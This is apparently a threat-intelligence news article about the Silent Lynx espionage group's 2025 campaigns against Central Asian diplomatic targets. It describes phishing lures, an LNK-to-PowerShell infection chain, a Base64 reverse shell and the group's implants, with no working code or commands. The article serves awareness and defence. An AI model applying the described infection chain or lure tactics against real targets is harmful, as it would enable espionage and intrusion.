Silent Lynx, a sophisticated cyber-espionage group tracked since 2024, has intensified its surveillance and infiltration campaigns across Central Asia, targeting diplomatic and government institutions.
Security researchers from Seqrite were the first to assign this nomenclature, distinguishing the group from overlapping aliases such as YoroTrooper, Sturgeon Phisher, and ShadowSilk.
A Focused Espionage Operation
Silent Lynx has become notorious for spear-phishing campaigns impersonating government officials. Their deceptive emails typically carry malicious attachments disguised as legitimate diplomatic correspondence, crafted to harvest sensitive data from high-value targets.
The group often leverages fake summit-related communications as lures to distribute weaponized payloads. According to Seqrite researchers, these operations are hastily constructed yet highly targeted, zeroing in on diplomatic entities involved in high-level international meetings.
Their activities span Tajikistan, Azerbaijan, Russia, and China, particularly focusing on nations engaged in cross-border infrastructure projects and strategic partnerships.
Recent Campaigns in 2025
Seqrite analysts identified two distinct Silent Lynx campaigns in 2025, both employing similar infection techniques but pursuing different geopolitical objectives:
- October 2025: Targeted diplomats preparing for the Russia-Azerbaijan Summit.
- Late 2025: Focused on organizations tied to China-Central Asian relations.
These campaigns underscore a coordinated espionage effort driven by political motives rather than financial incentives.
Infection Chain and Technical Breakdown
The attack begins with a malicious RAR archive disguised under a benign filename like:
“План развитие стратегического сотрудничества.pdf.rar” (Plan for Development of Strategic Cooperation).
Upon extraction, the archive reveals a malicious Windows shortcut (.LNK) file that abuses PowerShell.exe to download and execute obfuscated scripts from GitHub.
A notable artifact includes the working directory metadata:
C:\Users\GoBus\OneDrive\Рабочий стол
This served as a pivot point for researchers tracking related operations.
The PowerShell script, encoded in Base64, decodes into a reverse shell that connects to command-and-control (C2) servers over port 443.
This payload establishes a persistent TCP session, executing commands via Invoke-Expression and returning output to the operators.
Deployed Implants and Tools
Silent Lynx deploys a trio of custom and open-source implants to maintain control:
- Silent Loader – a C++-based downloader for secondary payloads.
- Laplas – a TCP/TLS reverse shell enabling remote command execution.
- SilentSweeper – a .NET implant capable of extracting and executing embedded PowerShell scripts.
The SilentSweeper tool accepts arguments such as -extract and -debug, reads qw.ps1 from its resources, executes it, and downloads further payloads.
In later stages, operators also use Ligolo-ng, an open-source tunneling tool that provides unrestricted remote access and lateral movement across compromised networks.
Operational Sophistication and OPSEC Gaps
While Silent Lynx shows strong operational security (OPSEC) awareness—through script obfuscation and encrypted communications—it still exhibits recurring infrastructure reuse and identifiable metadata that aid in attribution.
This combination of advanced techniques and human errors allows researchers to continuously track the group’s activities across regions.
Conclusion
Silent Lynx’s recent campaigns illustrate the evolving nature of state-sponsored cyber-espionage in Central Asia.
By exploiting geopolitical events and diplomatic communications, the group continues to threaten regional cybersecurity and intelligence confidentiality.
For governments and organizations operating in sensitive sectors, strengthening email security, endpoint monitoring, and PowerShell activity detection are crucial steps to counter such sophisticated threats.
